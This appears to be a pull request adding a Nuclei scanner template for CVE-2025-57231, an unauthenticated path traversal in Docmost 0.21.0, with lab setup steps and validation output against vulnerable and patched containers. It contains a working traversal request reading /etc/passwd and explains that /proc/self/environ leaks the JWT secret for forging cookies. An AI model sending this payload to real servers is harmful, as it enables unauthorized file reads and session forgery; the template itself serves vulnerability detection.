### PR TITLE
Add CVE-2025-57231 - Docmost 0.21.0 - Unauthenticated File Path Traversal

### DIFF
--- a/http/cves/2025/CVE-2025-57231.yaml
+++ b/http/cves/2025/CVE-2025-57231.yaml
@@ -1,0 +1,41 @@
+id: CVE-2025-57231
+
+info:
+  name: Docmost 0.21.0 - Arbitrary File Read
+  author: anirbala98
+  severity: high
+  description: |
+    Docmost from version 0.2.1 to version 0.21.0 does not properly validate file paths sent to the api/attachments/img/avatar endpoint, which is accessible without any authentication. 
+  impact: |
+    An unauthenticated attacker can read any file readable by the web server and even /proc/self/environ, which exposes the secret JWT token and makes it possible to forge authentication cookies.
+  remediation: |
+    Update Docmost to version 0.22.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-57231
+    - https://github.com/advisories/GHSA-59m3-fj8c-996g
+    - https://github.com/docmost/docmost/blob/0bd7ecb9b03a74e9a5e3f97b6457b82371c5ceb2/apps/server/src/core/attachment/attachment.controller.ts#L345
+    - https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-57231
+    epss-score: 0.00155
+    epss-percentile: 0.04981
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: docmost
+  tags: cve,cve2025,docmost,lfi,path-traversal,file-read
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/attachments/img/avatar/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'regex("root:[x*]?:0:0:", body)'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
### PR Information

Added a template for CVE-2025-57231. Docmost from versions 0.2.1 until 0.21.0 does not properly validate file paths sent to the /api/attachments/img/avatar endpoint. This endpoint is publicly accessible and does not require any authentication. Attackers can use this endpoint to query sensitive files like /etc/passwd and also retrieve /proc/self/environ, which exposes the secret JWT token and makes it possible to forge authentication cookies.

References:
- https://nvd.nist.gov/vuln/detail/CVE-2025-57231
- https://github.com/advisories/GHSA-59m3-fj8c-996g
- https://github.com/docmost/docmost/blob/0bd7ecb9b03a74e9a5e3f97b6457b82371c5ceb2/apps/server/src/core/attachment/attachment.controller.ts#L345
- https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive) using `docmost:0.21.0`
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive) using `docmost:0.22.0`

#### Additional Details

Lab:
```
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml

# Generate a long random secret key
openssl rand -hex 32

# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above

# Start the container
docker-compose up -d

# Navigate to http://localhost:3000/ and enter dummy details for workspace name, name, email and password
```
#### True Positive (v0.21.0)

```
└─$ nuclei -u http://localhost:3000 -t http/cves/2025/CVE-2025-57231.yaml -debug

GET /api/attachments/img/avatar/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

HTTP/1.1 200 OK
Content-Length: 739
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=86400
Connection: keep-alive
Content-Type: application/octet-stream

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
...

[CVE-2025-57231:dsl-1] [http] [high] http://localhost:3000/api/attachments/img/avatar/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
[INF] Scan completed in 24.728004ms. 1 matches found.
[INF] HTTP connections: 1 total, 1 new, 0 reused (0.0%)
```
#### True Negative (v0.22.0, patched)

```
└─$ nuclei -u http://localhost:3000 -t http/cves/2025/CVE-2025-57231.yaml

[INF] Scan completed in 47.024323ms. No results found.
[INF] HTTP connections: 1 total, 1 new, 0 reused (0.0%)
```